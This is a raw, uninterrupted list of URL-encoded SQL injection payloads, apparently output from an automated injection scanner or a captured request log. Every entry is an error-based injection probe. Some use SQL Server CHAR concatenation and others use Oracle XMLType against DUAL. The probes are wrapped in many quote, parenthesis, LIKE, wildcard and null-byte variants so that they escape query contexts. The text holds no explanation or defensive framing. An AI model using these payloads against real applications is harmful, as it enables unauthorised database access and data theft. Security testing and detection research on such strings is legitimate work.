-9877%27%20OR%208740%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288740%3D8740%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%27ZtCK%27%3D%27ZtCK -5125%27%29%20OR%208740%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288740%3D8740%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%27wiCf%27%20LIKE%20%27wiCf -1426%27%29%29%20OR%208740%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288740%3D8740%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27UYvS%27%20LIKE%20%27UYvS -4183%27%29%29%29%20OR%208740%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288740%3D8740%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27bQIu%27%20LIKE%20%27bQIu -1146%27%20OR%208740%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288740%3D8740%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%27zfcy%27%20LIKE%20%27zfcy -5155%22%29%20OR%208740%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288740%3D8740%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%22edAb%22%3D%22edAb -2029%22%29%29%20OR%208740%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288740%3D8740%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22diES%22%3D%22diES -9711%22%29%29%29%20OR%208740%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288740%3D8740%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22XMas%22%3D%22XMas -1839%22%20OR%208740%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288740%3D8740%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%22Sglw%22%3D%22Sglw -5366%22%29%20OR%208740%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288740%3D8740%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%22lLVB%22%20LIKE%20%22lLVB -4482%22%29%29%20OR%208740%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288740%3D8740%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22ZcIZ%22%20LIKE%20%22ZcIZ -7229%22%29%29%29%20OR%208740%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288740%3D8740%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22hxeR%22%20LIKE%20%22hxeR -9969%22%20OR%208740%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288740%3D8740%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%22hOYg%22%20LIKE%20%22hOYg -9132%25%27%29%20OR%208740%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288740%3D8740%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%27%25%27%3D%27 -4136%25%27%29%29%20OR%208740%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288740%3D8740%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27%25%27%3D%27 -6872%25%27%29%29%29%20OR%208740%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288740%3D8740%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27%25%27%3D%27 -5064%25%27%20OR%208740%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288740%3D8740%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%27%25%27%3D%27 -9809%00%27%29%20OR%208740%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288740%3D8740%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%27MOTV%27%3D%27MOTV -8659%00%27%20OR%208740%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288740%3D8740%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%27BSqt%27%3D%27BSqt -9143%27%29%20WHERE%202438%3D2438%20OR%208740%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288740%3D8740%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 -8670%22%29%20WHERE%203220%3D3220%20OR%208740%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288740%3D8740%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 -5092%27%20WHERE%206316%3D6316%20OR%208740%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288740%3D8740%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 -8370%22%20WHERE%209370%3D9370%20OR%208740%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288740%3D8740%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 -5614%29%20OR%202267%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282267%3D2267%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 -2038%29%20OR%202267%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282267%3D2267%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%287850%3D7850 -6730%29%29%20OR%202267%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282267%3D2267%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%283227%3D3227 -3941%29%29%29%20OR%202267%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282267%3D2267%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%287017%3D7017 -8592%20OR%202267%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282267%3D2267%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 -8534%29%20WHERE%209544%3D9544%20OR%202267%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282267%3D2267%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20--%20 -9726%20WHERE%206807%3D6807%20OR%202267%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282267%3D2267%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20--%20 -2054%27%29%20OR%202267%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282267%3D2267%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 -1183%27%20OR%202267%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282267%3D2267%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 -4363%22%20OR%202267%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282267%3D2267%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 -3686%27%29%20OR%202267%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282267%3D2267%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27EULh%27%3D%27EULh -1056%27%29%29%20OR%202267%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282267%3D2267%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%27xgLo%27%3D%27xgLo -4447%27%29%29%29%20OR%202267%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282267%3D2267%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%27emxp%27%3D%27emxp -3450%27%20OR%202267%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282267%3D2267%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27aHUb%27%3D%27aHUb -9357%27%29%20OR%202267%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282267%3D2267%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27fFoA%27%20LIKE%20%27fFoA -3567%27%29%29%20OR%202267%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282267%3D2267%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%27PpAI%27%20LIKE%20%27PpAI -7885%27%29%29%29%20OR%202267%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282267%3D2267%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%27NUKr%27%20LIKE%20%27NUKr -8137%27%20OR%202267%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282267%3D2267%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27uGIS%27%20LIKE%20%27uGIS -3049%22%29%20OR%202267%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282267%3D2267%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%22GSBj%22%3D%22GSBj -2302%22%29%29%20OR%202267%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282267%3D2267%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%22yUAo%22%3D%22yUAo -5566%22%29%29%29%20OR%202267%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282267%3D2267%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%22Tchy%22%3D%22Tchy -8244%22%20OR%202267%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282267%3D2267%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%22KlGB%22%3D%22KlGB -1218%22%29%20OR%202267%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282267%3D2267%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%22QtpZ%22%20LIKE%20%22QtpZ -4512%22%29%29%20OR%202267%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282267%3D2267%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%22ocbI%22%20LIKE%20%22ocbI -4935%22%29%29%29%20OR%202267%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282267%3D2267%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%22txeq%22%20LIKE%20%22txeq -6020%22%20OR%202267%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282267%3D2267%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%22ypPi%22%20LIKE%20%22ypPi -4458%25%27%29%20OR%202267%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282267%3D2267%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27%25%27%3D%27 -8317%25%27%29%29%20OR%202267%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282267%3D2267%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%27%25%27%3D%27 -6864%25%27%29%29%29%20OR%202267%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282267%3D2267%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%27%25%27%3D%27 -7820%25%27%20OR%202267%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282267%3D2267%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27%25%27%3D%27 